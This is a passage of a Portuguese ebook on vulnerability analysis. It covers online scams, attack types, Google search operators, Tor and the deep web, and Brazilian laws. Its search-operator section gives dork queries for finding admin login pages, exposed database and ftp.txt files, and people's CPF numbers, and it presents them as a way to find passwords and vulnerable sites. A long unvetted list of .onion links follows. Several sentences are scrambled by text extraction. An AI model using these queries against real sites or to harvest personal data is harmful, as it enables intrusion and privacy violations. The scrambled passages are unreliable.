Quais riscos se tentam evitar com u ma analise de vulnerabilidades? Além de analisar os sistemas computacionais e a infraestrutura, apresentar relatórios e sugestões é importante dotar todos os colaboradores da empresa contratante de informações sobre as fraudes cometidas com a utilização da Internet. Isso pode ser feito pela própria equipe contratante ou equipe externa através de palestras pontuais, demonstrações de fraudes etc. Pois um dos principais ataques é a engenharia social e normalmente é disparado contra usuários finais.

Erros cometidos pelos usuários finais e profissionais descuidados Acesso a conteúdos impróprios ou ofensivos : Ao navegar você pode se deparar com páginas que contenham pornografia, que atentem contra a honra ou que incitem o ódio e ao racismo.

Contato com pessoas mal-intencionadas: existem pessoas que se aproveitam da falsa sensação de anonimato da Internet para aplicar


r.c om .br

32


golpes, tentar se passar por outras pessoas e cometer crimes como, por exemplo, estelionato, pornografia infantil e sequestro.

Sequestro de identidade: Assim como você pode ter contato direto com impostores, também pode ocorrer de alguém tentar se passar por você e executar ações em seu nome, levando outras pessoas a acreditarem que estão se relacionando com você, e colocando em risco a sua reputação.

Furto e perda de dados : Os dados presentes em seus equipamentos conectados à Internet podem ser furtados e apagados, pela ação de ladrões, atacantes e códigos maliciosos, existem quadrilhas especializadas nesse tipo de crime, no que chamamos de submundo da Web.

Invasão de privacidade: A divulgação de informações pessoais pode comprometer a sua privacidade, de seus amigos e familiares e, mesmo que você restrinja o acesso, não ha como controlar que elas não serão repassadas. Além disto, os sites costumam ter políticas próprias de privacidade e podem alterá-las sem aviso prévio, tornando público àquilo que antes era privado.

Divulgação de boatos: As informações na Internet podem se propagar rapidamente e atingir um grande número de pessoas em um curtíssimo período de tempo.


r.c om .br

33


Dificuldade de exclusão: Aquilo que é divulgado na Internet nem sempre pode ser totalmente excluído ou ter o acesso controlado. Uma opinião dada em um momento de impulso pode ficar acessível por tempo indeterminado e pode de alguma forma, ser usada contra você e acessada por diferentes pessoas, desde seus familiares até seus chefes, prejudicando sua vida pessoal e profissional.

Dificuldade de detectar e expressar sentimentos: Quando você se comunica via Internet não há como observar as expressões faciais ou o tom da voz das outras pessoas, assim como elas não podem observar você. Isto pode dificultar a percepção do risco e pode gerar mal-entendido e interpretações dúbias.

Dificuldade de manter sigilo: No seu dia a dia é possível ter uma conversa confidencial com alguém e tomar cuidados para que ninguém mais tenha acesso ao que você está falando. Na Internet isso não será possível, pois as informações irão trafegar por caminhos desconhecidos ou mesmo ficar armazenada em equipamento com falhas de segurança e outras pessoas podem ter acesso facilmente.

Uso excessivo: O uso desmedido da Internet, assim como de outras tecnologias, pode colocar o seu emprego em risco, pois diminui sua produtividade e isso afeta a sua vida social ou profissional.

Plágio e violações de direitos autorais : A cópia, alterações ou


r.c om .br

34


distribuição não autorizada de conteúdos e materiais protegidos pode contrariar a lei de direitos autorais e resultar em problemas jurídicos e em perdas financeiras. Mais o maior risco relacionado ao uso da Internet é o de você achar que não corre riscos, pois supõe que ninguém tem interesse em utilizar o seu computador ou que, entre os diversos computadores conectados à Internet, o seu dificilmente será localizado. É justamente este tipo de pensamento que é explorado pelos atacantes, pois, ao se sentir seguro você pode achar que não precisa se prevenir esta ilusão, infelizmente, na maioria dos casos termina quando os primeiros problemas aparecem. Muitas vezes os atacantes estão interessados em conseguir acesso a grandes quantidades de computadores, Independente de quais ou de quem são, e para isto, podem efetuar varreduras na rede e localizar grande parte dos computadores conectados à Internet, inclusive o seu. Basta um problema de segurança em seu computador para torná-lo disponível e colocar em risco todos os seus dados e consequentemente sua falsa sensação de segurança culminará em sérios problemas. É a partir daí que seus problemas começam e pode ter certeza, você terá muitas dores de cabeça se não souber o caminho a seguir.

Quais os principais golpes aplicados com a utilização da Internet? Normalmente, atacar e fraudar computadores e servidores de um banco ou grande empresa não é o que se pode chamar de tarefa


r.c om .br

35


simples devido o alto nível de conhecimento das equipes de segurança e resposta a incidentes dessas corporações, investimentos em equipamentos de proteção e diversas outras razões. É nesse ponto que os golpistas concentram os esforços nas fragilidades dos usuários finais. Assim eles podem abusar das técnicas de engenharia social, eles tentam persuadir as potenciais vítimas a fornecerem informações sensíveis ou a realizarem ações como executar códigos maliciosos e ou acessar páginas falsas que eles mesmos hospedaram na Web com esse objetivo. A maioria dos golpes aplicados pela Internet podem ser classificados como crimes contra o patrimônio, tipificados como estelionato. Dessa forma, o golpista pode ser considerado um estelionatário.

Furto de identidade O furto de identidade, é o ato pelo qual uma pessoa tenta se passar por outra, atribuindo-se uma falsa identidade, com o objetivo de obter vantagens indevidas. Alguns casos de furto de identidade podem ser considerados como crime contra a fé pública, tipificados como falsa identidade. No seu dia a dia, sua identidade pode ser furtada, de posse de todos os dados uma quadrilha pode cometer fraudes, por exemplo, alguém pode abrir uma empresa ou uma conta bancária usando seu nome e seus documentos. Na Internet isto também pode ocorrer, caso alguém tenha acesso a


r.c om .br

36


seus dados e crie um perfil em seu nome em uma rede social, acesse sua conta de e-mail e envie mensagens se passando por você ou falsifique os campos de e-mail, fazendo parecer que ele foi enviado por você. Continue lendo, pois nessa obra você aprenderá os caminhos a percorrer caso sua identidade seja furtada, sem conhecimentos você certamente arcará com as graves consequências por ter tido sua identidade furtada. Até que você consiga reverter o caso a seu favor, certamente já amargou muitos dissabores.

Fraude de antecipação de recursos Certa vez eu “Adonel Bezerra” estava em uma agência bancária

conversando com o gerente quando se aproximou uma senhora, aproximadamente 65 anos, ofegante entregou seu cartão ao gerente e solicitou a liberação de um empréstimo no valor de R$ 6.000,00. Enquanto o gerente interrompeu nossa conversa e pegou o cartão para consultar a conta, a senhora sentou em uma cadeira ao meu lado e começamos a conversar, ela estava muito feliz porque tinha recebido um telefone de um escritório de advocacia muito famoso com sede em Brasília. Nesse telefonema foi lhe comunicado que ela receberia R$ 192.356,00 referentes à restituição do plano Collor. Que esse valor era referente a uma ação coletiva movida em favor de todos os brasileiros que tinha conta bancária no período Collor. Para receber


r.c om .br

37


tal liberação imediata em sua conta a referida senhora só deveria pagar às custas do processo, no valor de R$ 5.811,00, valor esse que deveria ser depositado imediatamente em uma conta bancária fornecida pelo suposto escritório de advocacia. Para demonstrar a veracidade eles enviaram um documento por fax informando o valor que já estava apenas para liberação imediata assim que às tais custas do processo fosse depositada. Esse é um caso real desse tipo de golpe, pois a fraude de antecipação de recursos é aquela na qual um golpista procura induzir uma pessoa a fornecer informações confidenciais ou a realizar um pagamento adiantado, com a promessa de futuramente receber algum tipo de benefício, normalmente muito maior que a irrisória quantia solicitada. Isso se da por meio do recebimento de mensagens eletrônicas ou do acesso a sites fraudulentos, a pessoa inventa uma história mirabolante e faz uma oferta irrecusável, você só teria que fornecer seus dados pessoais ou mandar algum valor antecipado para o golpista e todos os seus problemas seriam resolvidos. Há. A senhora, devidamente orientada, desistiu de tomar o empréstimo, orientei que ela esperasse o dinheiro cair na conta para poder pagar as tais custas e que procurasse a delegacia para registrar um boletim de ocorrência imediatamente. Essa se livrou de uma divida de R$ 6.000,00 mais muita gente tem caído nesse golpe.


r.c om .br

38


Phishing O phishing é o tipo de fraude onde um golpista tenta obter dados pessoais e financeiros de um usuário pela utilização de técnicas combinadas de meios técnicos, como envio de emails com códigos maliciosos e engenharia social.

Pharming Pharming é uma técnica de phishing que envolve o redirecionamento da navegação do usuário para sites falsos, normalmente por intermédio de alterações feitas no serviço de DNS (Domain Name System). Assim, quando o usuário tenta acessar um site legítimo, o navegador Web de sua máquina é redirecionado para uma página falsa, o pior disso é que isso ocorre de forma transparente, pois a página falsa é idêntica à verdadeira. Não é uma técnica muito fácil, porque envolve o comprometimento do servidor de DNS do provedor de acesso a internet que o usuário utiliza, normalmente utilizando-se da ação de códigos maliciosos projetados para alterar o comportamento do serviço de DNS do computador.

Golpes de comércio eletrônico Os golpes de comércio eletrônico são os preferidos pelas quadrilhas no submundo da Web e tem o objetivo de se obter vantagens financeiras, exploram a relação de confiança existente entre as partes


r.c om .br

39


envolvidas em uma transação comercial e podem se apresentar na prática de diversas formas. Um exemplo claro é o site de comércio eletrônico fraudulento onde o golpista cria um site fraudulento, com o objetivo de enganar os possíveis clientes que, após efetuarem os pagamentos, nunca recebem as mercadorias.

Golpe envolvendo sites de compras coletivas: Os sites de compras coletivas também têm sido largamente utilizados para aplicar esse tipo de golpe. Para obter sucesso os golpistas costumam mandar mensagens em nome dos sites verdadeiros, desta forma, tentam induzir o internauta a acessar uma determinada página falsa e a fornecer dados pessoais. Incluem-se ainda os golpes de sites de leilões

Boato Um boato, ou hoax é uma mensagem que possui conteúdo alarmante ou falso e que, geralmente, tem como remetente, ou aponta como autora, alguma instituição importante. É muito utilizado nos golpes de pirâmide, correntes etc. Tratei ate aqui dos golpes comuns contra usuários que navegam pela internet. A seguir vamos tratar de forma detalhada dos ataques. Ataques esses que não se resumem ao usuário final, mais a toda rede de uma corporação ou mesmo a própria Infraestrutura de internet.

Ataques disparados pela Internet www .cl ube doh acke

r.c om .br

40


Os ataques costumam ocorrer na Internet com diversos objetivos, visando diferentes alvos e usando técnicas variadas. Qualquer serviço, computador ou rede que seja acessível via Internet pode ser um alvo em potencial de um determinado ataque, também qualquer computador ligado à Internet pode não apenas ser um alvo, mais também participar de um ataque como zumbi. Os motivos que levam um atacante ou grupo de atacantes a disparar um ataque na Internet são bastante diversos, variando da simples diversão até mesmo para o cometimento de atos ilícitos. Podem ser motivados pela demonstração de poder, Ganhar prestígio em determinada comunidade quando pretende vangloriar-se perante outros atacantes por ter conseguido invadir determinados computadores ou redes ou mesmo deixar os serviços inacessíveis, desfigurar sites considerados visados, disputar com outros atacantes ou grupos de atacantes para revelar quem consegue realizar o maior número de ataques ou ser o primeiro a conseguir atingir um determinado alvo. Motivação financeira, ideologia dentre outras.

Exploração de vulnerabilidades Uma vulnerabilidade é definida como uma condição que, quando explorada por um atacante, pode resultar em uma violação de segurança. Um ataque de exploração de vulnerabilidades ocorre


r.c om .br

41


quando um atacante, utilizando-se de uma ou várias vulnerabilidades encontradas e tenta executar ações maliciosas ou não, como invadir um sistema, acessar informações confidenciais, disparar ataques contra outros computadores ou tornar um serviço indisponível por determinado tempo.

Varredura em redes Varredura em redes, ou scan, é uma técnica que consiste em efetuar buscas minuciosas em redes, com o objetivo de identificar computadores ativos e coletar informações sobre tais computadores, informações como, quais serviços estão ativos, quais os programas instalados, versões de sistemas etc. Baseados nessas informações, um atacante pode determinar se existem vulnerabilidades no sistema ou nos serviços instalados.

Falsificação de e-mail A falsificação de e-mail é uma técnica que consiste em alterar campos do cabeçalho de um e-mail, de forma a aparentar que ele foi enviado de uma determinada srcem quando, na verdade, foi enviado de outra. Isso é possível devido a características próprias do protocolo SMTP (Simple Mail Transfer Protocol) que permitem que campos do cabeçalho, como “From:” (endereço de quem enviou a mensagem), e “Reply-To” (endereço de resposta da mensagem) ou mesmo o


r.c om .br

42


“Return-Path” (endereço para onde possíveis erros no envio da

mensagem são enviados), sejam falsificados. Ataques deste tipo são bastante usados para propagação de códigos maliciosos, envio de spam e em golpes de phishing.

Interceptação de tráfego A interceptação de tráfego é uma técnica que consiste em inspecionar os dados trafegados em segmentos de redes de computadores, por meio do uso de programas específicos chamados de sniffers ou analisadores de protocolos. Esta técnica pode ser utilizada de forma legítima dentro das empresas por administradores de redes, para detectar problemas, analisar desempenho e monitorar atividades maliciosas relativas aos computadores ou redes por eles administrados, ou maliciosa, por atacantes com o objetivo de capturar informações sensíveis, como senhas, números de cartões de crédito e o conteúdo de arquivos confidenciais que estejam trafegando por meio de conexões sem criptografia.

Força bruta Um ataque de força bruta, consiste em adivinhar, por tentativa e erro, um nome de usuário e ou senha, assim pode-se executar processos e acessar sites, computadores e serviços utilizando-se das credenciais de terceiro com os mesmos privilégios. Qualquer computador,


r.c om .br

43


equipamento de rede ou serviço que seja acessível via Internet e que use um nome de usuário e senha, pode ser alvo de um ataque de força bruta.

Desfiguração de página Desfiguração de página uma técnica que consiste em alterar o conteúdo da página Web de um site. As principais formas que um atacante pode utilizar para desfigurar uma página Web são a exploração de erros na aplicação Web; a exploração de vulnerabilidades do servidor de aplicações; a exploração de vulnerabilidades da linguagem de programação ou dos pacotes utilizados no desenvolvimento; O furto de senhas de acesso da área de administração do site.

Negação de serviços A negação de serviços, ou DoS (Denial of Service), é uma técnica pela qual um atacante utiliza um ou vários computadores para tirar de operação um serviço, um computador ou uma rede conectada a Internet. Quando utilizada de forma coordenada e distribuída, ou seja, quando um conjunto de computadores é utilizado no ataque, recebe o nome de negação de serviço distribuído, ou DDoS (Distributed Denial of Service). O objetivo destes ataques não é invadir e nem coletar


r.c om .br

44


informações, mas simplesmente causar indisponibilidade do sistema alvo. Penso que aqui fechamos essa parte conceitual sobre a introdução.

Navegando pela superfície da Web Em nossas vidas andamos por muitos lugares, lugares nunca antes imaginados por nossa mente e mesmo assim passeamos e nos maravilhamos com tudo que era antes desconhecido. Navegar na Internet sempre nos trás os mesmos sentimentos exceto que na Internet tudo acontece em alguns cliques. A web ou rede mundial de computadores esconde muitas surpresas, surpresas essas que os motores de busca tradicionais como google, yahoo, bing e outros simplesmente não conseguem enxergar e é sobre essa web que iremos tratar agora. Mais vamos entender um pouco a ideia de pesquisa como estamos acostumados, como se faz uma busca na internet utilizando os motores de busca tradicionais. Sempre que pensamos em fazer pesquisa na web o que vem logo a nossa a mente? É o google, claro! A ideia de ter mais de 1,5 bilhão de páginas reunidas em um único local parece bem interessante. Através dele nossas pesquisas ficam mais fáceis, encontramos tudo que precisamos desde que saibamos alguns operadores para orientá-lo em


r.c om .br

45


nossas pesquisas, ou seja, temos que orientar o próprio sistema de busca para filtrar o conteúdo que queremos buscar na web e isso é fácil, basta que dominemos alguns poucos operadores. O Google é umas das ferramentas mais fabulosas que existe, esse site de busca é tão eficiente que todos sempre falam, “Se não tem no

google, não existe na web” mais creio que o correto seria afirmar que, se não tiver no Google não está na superfície da web" pois pode perfeitamente estar na Deep Web. O Google é, essencialmente, um mecanismo de busca de palavras e links pela Internet, utilizando diversos recursos de filtragem e catalogação de resultados. O quealgoritmos garantiu odesucesso do de Google, dos outros foram seus extração dados,em quedetrimento tornam qualquer busca muito mais rápida do que as buscas realizadas com os outros sistemas de busca, sua interface limpa também foi um fator que contou a seu favor, pois seu front-end é composto apenas por texto e links em HTML, o que o torna bem mais rápido em suas respostas, considerando que suas exigências de processamento são bem menores.


r.c om .br

46


A lógica booleana Outro diferencial fica por conta da engrenagem lógica do Google, que utiliza a lógica booleana. Batizada assim para homenagear o matemático britânico George Boole, esse sistema estabelece a possibilidade de busca de palavras em um texto, condicionando a exibição de resultados a valores lógicos: Onde um valor deve ser sempre verdadeiro ou falso; um valor não pode ser verdadeiro e falso ao mesmo tempo; matematicamente verdadeiro pode ser definido como “1”, e falso, como “0”.

Visando não delimitar a busca em demasia, são utilizados elementos para incrementar as funções booleanas ou algoritmos de busca utilizados pelo Google.

Desses elementos, os mais conhecidos são: AND – Esse delimitador é utilizado para incluir, em uma expressão, todos os elementos que serão propostos em uma consulta.


r.c om .br

47


O Google não utiliza o delimitador AND de forma explícita: basta digitar os termos separados por um espaço para sua inclusão na busca.

OR – Delimitador de variável. O OR (sempre em maiúscula) é utilizado para encontrar páginas em que se encontre um ou outro termo de uma busca. NOT (-) – Esse operador é utilizado para suprimir um determinado termo de uma busca, servindo como um filtro de conteúdo. ASPAS (“ ”) – As aspas são utilizadas na lógica booleana para

garantir que uma expressão completa ou um conjunto de termos seja incluída na busca.

Outros delimitadores de busca Imagine que você deseja obter o máximo de informações sobre um determinado site, desejadeconseguir encontrar e até conseguir senhas bancos desenhas, dados você pode sites com vulneráveis o google, desde que esteja na superfície da web.

Alguns exemplos de pesquisa. 

Digitando: “clubedohacker” – o google mostra apenas

resultados que tenha exatamente a palavra clubedohacker. Primeiros comandos (operadores):

Intext:clubedohacker: (onde clubedohacker é o texto desejado) – com esse comando é possível visualizar todas paginas que contem o texto clubedohacker.


r.c om .br

48


Intitle:adonel: com esse comando é possível visualizar todas as paginas que contem como titulo a palavra adonel. 

Inurl:adonel: Aqui serão exibidas todas as páginas que contem na url a palavra adonel. 

Hacker site:br: (onde br é a sigla do país desejado) – com esse comando podemos pesquisar sites de um determinado país, ou também de um tipo determinado, por exemplo:

site:gov: para sites do governo site:org: para sites de instituições para sites militares e assim por diante, esse tipo de filtragem site:mil: é muito interessante e veremos que utilizaremos bastante isso pra melhorar nossa filtragem. Ex: tcpip site:com.br - Busca sites .com.br que contém tcpip

Filetype: tipo (onde tipo é o tipo de arquivo podendo ser .doc .rar .jpg .xls .mdb etc) Ex: Hacker filetype:doc – Busca arquivos com nome hacker.doc (documento do word) Para pegar um cpf basta digital: Cpf+adonel – Busca todos adonel e numero de cpf


r.c om .br

49


O google também pode efetuar cálculos, basta saber os operadores lógicos. (+) soma – (-) subtrai – (/) divisão – (*) multiplicação Para fazer uma conta basta digitar a conta e teclar enter: 46*2 - o google exibiria 92 como resultado, para o algoritmo do google isso tudo é normal.

Servindo como scanner Inurl:admin.asp: – com esse comando o google mostra paginas de login criadas em asp.

Inurl:/login/index.asp :gov.br: Nesse comando o google traz todas paginas do governo brasileiro que tenha pagina de login em asp.

index of: esse comando retorna paginas que não estejam indexadas. *.mdb :com.br "index of“: busca de sites .com.br que não estejam indexados.

"ftp.txt" :.com.br "index of“: – o resultado aqui será a busca e apresentação de sites com arquivo ftp.txt.


r.c om .br

50


Navegando pela web profunda O google não consegue ver todo conteúdo da WEB;

A internet que muitos não veem! Mais o que é mesmo essa deep web? - Bem, é basicamente uma parte mais profunda da internet que nossos motores de busca não podem indexar o que torna quase invisível ou inacessível para quem não sabe que existe. Estima-se, (mais sem nenhuma comprovação) que quase 20 mil terabytes em mais de 950 bilhões de documentos indisponíveis para acesso via mecanismos de busca. Um site para ser indexado, normalmente precisam apenas que seja habilitada as Funções


r.c om .br

51


“follow” e “nofollow” o que define se você quer ou não ter seu

conteúdo indexado pelos robôs dos mecanismos de busca. Tem também o arquivo robots.txt para configuração manual. Para navegar na deep web você irá necessitar de um navegador especial, pois nem o Internet Explorer nem o Firefox irá exibir seu conteúdo.

Motores de busca: Existem inúmeros motores de busca para a superfície da web, mais que não servem para deep web por suas limitações. Você pode começar utilizando o TOR O Tor oferece uma plataforma, chamada de Onion, onde os desenvolvedores podem construir novos aplicativos baseados em anonimato, com mais segurança e privacidade. 


r.c om .br

52


Ele traz seu próprio navegador ligado a uma rede de proxy onde uma informação trafega por vários computadores pertencente a rede tor até chegar no destino. Isso significa que você irá acessar a deep web de forma anônima, mais alguns cuidados são necessários, como nunca fornecer dados pessoais reais; ter um email na deep web pra se cadastrar nos grupos etc.


r.c om .br

53


Vamos acessar alguns sites da deep web para servir como exemplo apenas. Vale ressaltar que nessa camada da Internet não existem somente bandidos, existe muito conteúdo melhor que na superfície inclusive. Vale muito a pena conhecer e explorar essa área. Outra vantagem de você navegar na deep web é o fato de estar sempre atualizado sobre as ações, os planos de ataque etc. Estando navegando constantemente nela você terá maiores chances de agir e defender sua rede, bem com de seus clientes.

Tor Mail - o Tor Mail é um serviço de email criado e totalmente mantido na Deep Web. Com encriptação refinada e segurança máxima, é o endereço de email com o qual deverá se identificar sempre que se inscrever em fóruns ou semelhantes na Deep Web. A inscrição é gratuita e seu email será do gênero: [email protected].


r.c om .br

54




Tipo de URL: http://jhiwjjlqpyawmpjx.onion/

The Hidden Wiki - O website mais popular e acessado na Deep Web. Com a mesma interface utilizada pela Wikipédia, completamente open source, permite a criação de “clones” de sua interface, não serve exatamente como dicionário e enciclopédia, mas sim como um

diretório, através dela você poderá ter acesso a centenas de links, com as descrições dos websites separados por categorias. 

URL: ht tp://kpvz7ki2v5agwt35.onion/


r.c om .br

55


URL: http://552egj2iappsjjdu.onion/Backup/Turorial_Como%20manter se%20seguro%20e%20oculto%20na%20DW_byNeoHackerZ.txt 

Circle- Uma excelente base onde você pode criar painéis de discussão, entrar em painéis já existentes, hospedar imagens, criar uma comunidade “SnapBBS” etc. URL: http://4eiruntyxxbgfv7o.onion/ 


r.c om .br

56


Busca por Pessoas - pipl.com/


r.c om .br

57


Essas imagens comprovam que as coisas aontecem livremente na deep web


r.c om .br

58


Listei aqui algumas Url´s da deep web para que você possa começar Download: http://jntlesnev5o7zysa.onion/

Buscadores


r.c om .br

59


http://ahmia.fi/ http://dppmfxaacucguzpc.onion/ http://xmh57jrzrnw6insl.onion/ http://3g2upl4pq6kufc4m.onion/ Para buscar torrentes: http://sc3njt2i2j4fvqa3.onion/ http://4eiruntyxxbgfv7o.onion/ http://am4wuhz3zifexz5u.onion/ http://627kx22vati6uqkw.onion/ http://hkfjbmo2rdjun56b.onion/ (onionchan, dead) http://kpynyvym6xqi7wz2.onion/files.html http://4eiruntyxxbgfv7o.onion/snapbbs/736364f4/showthread.php?&t hreadid=0bf8a39efd46fd7dd67dc3a1 d0291860


r.c om .br

60


http://kpvz7ki2v5agwt35.onion/wiki/index.php/Main_Page (hidden wiki) http://627kx22vati6uqkw.onion/ http://4eiruntyxxbgfv7o.onion/pm/ http:// kpvz7ki2v5agwt35.onion http://7cov2loswjrmaqot secret corner http://6x77gb7ngu6nymwl.onion http://opva2pilsncvtwmh.onion http://7cov2loswjrmaqot.onion http://eqt5g4fuenphqinx.onion/ http://b4yrk2nkydqfpzqm.onion/girls/topic/1045+full/ http://m3hjrfh4hlqc67gb.onion/inliner.php?num=50&size=120&filter =0 http://kpvz7ki2v5agwt35.onion/wiki/index.php/Main_Page http://opva2pilsncvtwmh.onion/ http://b4yrk2nkydqfpzqm.onion/ http://lph5po3mivnjjzjo.onion/kusaba.php http://jkpos24pl2r3urlw.onion:6969/ http://6sxoyfb3h2nvok2d.onion/ http://dppmfxaacucguzpc.onion/ http://kpynyvym6xqi7wz2.onion/files.html


r.c om .br

61


http://kpynyvym6xqi7wz2.onion/links.html http://dppmfxaacucguzpc.onion/


r.c om .br

62


http://clsvtzwzdgzkjda7.onion/ http://mlz3apezci5ya6k6.onion/ http://hmybz2aqe7whj7qr onion/wiki/Main_Page http://sx3jvhfgzhw44p3x.onion/ http://www.jordanmaxwell.com/links. html http://xqz3u5drneuzhaeo.onion/users/heidenwut2/books/000i.html

http://xqz3u5drneuzhaeo.onion/users/heidenwut2/games/000i.html

r.c om .br

63


http://am4wuhz3zifexz5u.onion <- Tor Library. http://ci3hn2uzjw2wby3z.onion http://p2uekn2yfvlvpzbu.onion http://ci3hn2uzjw2wby3z.onion <-Site de hospedagem na onion.

http://kpvz7ki2v5agwt35.onion http://xqz3u5drneuzhaeo.onion http://7ll6yck7azloqjqv.onion <-Tor Music. http://ci3hn2uzjw2wby3z.onion <-Tor directory. http://a5ec6f6zcxtudtch.onion <-Anonymous Email.


r.c om .br

64


http://5onwnspjvuk7cwvk.onion http://kpynyvym6xqi7wz2.onion/links.html http://xmh57jrzrnw6insl.onion/ <-TORCH (site de busca) http://4eiruntyxxbgfv7o.onion/snapbbs/1acda566/threadlist.php?PHP SESSID=65odjfpu90ktst1ttj2959hnu6 http://hmybz2aqe7whj7qr.onion http://kpynyvym6xqi7wz2.onion/lyingninja.txt http://kpynyvym6xqi7wz2.onion/fuksomeone.txt http://kpynyvym6xqi7wz2.onion/success.txt http://kpynyvym6xqi7wz2.onion/


r.c om .br

65


ttp://kpynyvym6xqi7wz2.onion/molitov.txt http://utup22qsb6ebeejs.onion/ http://3g2upl4pq6kufc4m.onion http://4eiruntyxxbgfv7o.onion/ http://am4wuhz3zifexz5u.onion/ - Tor Library http://627kx22vati6uqkw.onion http://4eiruntyxxbgfv7o.onion/ http://4eiruntyxxbgfv7o.onion/pm/ - TorPM http://eqt5g4fuenphqinx.onion/ - Core.onion Nesse capítulo nós apresentamos a introdução e alguns termos importantes que irão nos apoiar em direção ao nosso objetivo final que é entender o processo de analise de vulnerabilidades. Continue para o capitulo dois onde iremos continuar nossos estudos.


r.c om .br

66


Organização de uma análise de vulnerabilidades Uma analise de vulnerabilidades deve ser organizada em etapas e nenhuma delas deve ser negligenciada sob qualquer hipótese. Somente com essa divisão pode-se manter o controle de todas as ações e chegar aos resultados que se espera.

O contrato, parte essencial. O contrato é parte essencial para delimitar o escopo das atividades, é ele que vai definir o que pode ou não ser feitos para se encontrar as possíveis vulnerabilidades. É também fonte de consulta em todas as fases do processo, assim podem-se evitar enganos, má interpretações, uso da emoção na hora da execução etc. No contrato devem ser previstas clausulas que protejam tanto o cliente no que se refere ao vazamento de informações quanto o contratado no que concernente ao escopo dos testes. Para que não haja problemas nesse aspecto, deve-se sempre obervar o disposto em Lei vigente nos países onde ocorrerão os testes. Consideremos o exemplo de um escopo onde será necessária a realização de testes em uma determinada infraestrutura de sistemas computacionais e o esse escopo alcança as aplicações web, mas, tais aplicações estão hospedadas em servidores que estão fisicamente fora do Brasil. Nesse caso, alem do disposto na Lei brasileira deve-se observar o disposto nas leis do país onde se encontra fisicamente o hardware. Considerando que esse guia deveascobrir território e que no caso citado devemos considerar leis deo cada país,brasileiro, então passemos a analisar e conhecer as nossas leis, o que determinam e quais cuidados, quais cláusulas devemos incluir no contrato, qual melhor modelo de contrato para contratado e contratante?


r.c om .br

67


Essas são algumas perguntas que tentaremos responder nesse capitulo.

O que dizem as Leis? Lei nº 4.117, de 27 de agosto de 1962 Instituiu o Código Brasileiro de Telecomunicações. Houve alterações introduzidas pelo Decreto-Lei nº 236, de 28 de fevereiro de 1967. E foi revogada pela Lei nº 9.472/96, exceto em se tratando de matéria penal não mencionada na referida Lei e aos preceitos relativos à radiodifusão. Lei nº 4.117 foi à primeira Lei que podemos considerar que tratou da criação e regulamentação dos serviços de telecomunicações no Brasil, mesmo tendo o foco nas concessionárias e seus agentes já trouxe penalidades a quem violar a privacidade, divulgar informações falsas e todos os outros crimes contra a honra e a moral, crimes esses que são cometidos a todo o momento na Internet de hoje, pois o uso da liberdade de expressão só pode ter respaldo se observados o direito em sua essência. Visto que envolve pessoas e bens materiais protegidos por Lei.

A saber: Art. 4º Para os efeitos desta lei constituem serviços de telecomunicações a transmissão, emissão ou recepção de símbolos, caracteres, sinais, escritos, imagens, sons ou informações de qualquer natureza, por fio, rádio, eletricidade, meios óticos ou qualquer outro processo eletromagnético. Telegrafia é o processo de telecomunicação destinado à transmissão de escritos, pelo uso de um código de sinais. Telefonia é o processo de telecomunicação destinado à transmissão da palavra falada ou de sons. 



Art. 32: § 2º Considera-se interferência qualquer emissão, irradiação ou indução que obstrua, total ou parcialmente, ou interrompa repetidamente serviços radioelétricos.


r.c om .br

68


Das Infrações e Penalidades 



Art. 52. A liberdade de radiodifusão não exclui a punição dos que praticarem abusos no seu exercício. abuso, desse no exercício liberdade da para Art 53. Constitui radiodifusão, o emprego meio dedecomunicação a prática de crime ou contravenção previsto na legislação em vigor no País, inclusive: * Promover campanha discriminatória de classe, cor, raça ou religião; (Ler o Decreto-Lei nº 236, de 1968) * Ofender a moral familiar, pública, ou os bons costumes; (Decreto-Lei nº 236, de 1968)

Lei nº 7.102, de 20 de junho de 1983 (DOU de 21/06/1983) Dispõe sobre segurança para estabelecimentos financeiros, estabelece normas para constituição e funcionamento das empresas que exploram serviços de vigilância e de transporte de valoresparticulares etc.

Lei nº 8.137, de 27 de dezembro de 1990 (DOU de 28/12/1990) Definiu os crimes contra a ordem tributária, econômica e contra as relações de consumo etc. Lei nº 8.159, de 08 de janeiro de 1991 (DOU de 09/01/1991) Dispõe sobre a política nacional de arquivos públicos e privados etc. Lei nº 8.977, de 06 de janeiro de 1995 (DOU de 09/01/1995) Dispõe sobre o Serviço de TV a Cabo etc. Lei nº 9.296, de 24 de julho de 1996 (DOU de 25/07/1996) Regulamenta o inciso XII, parte final, do art. 5º da Constituição Federal que trata sobre o sigilo nas comunicações telefônicas.


r.c om .br

69


Presidência da República Casa Civil Subchefia para Assuntos Jurídicos LEI Nº 9.296, DE 24 DE JULHO DE 1996. O PRESIDENTE DA REPÚBLICA Faço saber que o Congresso Nacional decreta e eu sanciono a seguinte Lei: Art. 1º A interceptação de comunicações telefônicas, de qualquer natureza, para prova em investigação criminal e em instrução processual penal, observará o disposto nesta Lei e dependerá de ordem do juiz competente da ação principal, sob segredo de justiça. Parágrafo único. O disposto nesta Lei aplica-se à interceptação do fluxo de comunicações em sistemas de informática e telemática. Art. 2° Não será admitida a interceptação de comunicações telefônicas quando ocorrer qualquer das seguintes hipóteses: I - Não houver indícios razoáveis da autoria ou participação em infração penal; II - A prova puder ser feita por outros meios disponíveis; III - O fato investigado constituir infração penal punida, no máximo, com pena de detenção. Parágrafo único. Em qualquer hipótese deve ser descrita com clareza a situação objeto da investigação, inclusive com a indicação e qualificação dos investigados, salvo impossibilidade manifesta, devidamente justificada. Art. 3° A interceptação das comunicações telefônicas poderá ser determinada pelo juiz, de ofício ou a requerimento: I - Da autoridade policial, na investigação criminal; II - Do representante do Ministério Público, na investigação criminal e na instrução processual penal.


r.c om .br

70


Art. 4° O pedido de interceptação de comunicação telefônica conterá a demonstração de que a sua realização é necessária à apuração de infração penal, com indicação dos meios a serem empregados. § 1° Excepcionalmente, o juiz poderá admitir que o pedido seja formulado verbalmente, desde que estejam presentes os pressupostos que autorizem a interceptação, caso em que a concessão será condicionada à sua redução a termo. § 2° O juiz, no prazo máximo de vinte e quatro horas, decidirá sobre o pedido. Art. 5° A decisão será fundamentada, sob pena de nulidade, indicando também a forma de execução da diligência, que não poderá exceder o prazo de quinze dias, renovável por igual tempo uma vez comprovada a indispensabilidade do meio de prova. Art. 6° Deferido o pedido, a autoridade policial conduzirá os procedimentos de interceptação, dando ciência ao Ministério Público, que poderá acompanhar a sua realização. § 1° No caso de a diligência possibilitar a gravação da comunicação interceptada, será determinada a sua transcrição. § 2° Cumprida a diligência, a autoridade policial encaminhará o resultado da interceptação ao juiz, acompanhado de auto circunstanciado, que deverá conter o resumo das operações realizadas. § 3° Recebidos esses elementos, o juiz determinará a providência do art. 8° , ciente o 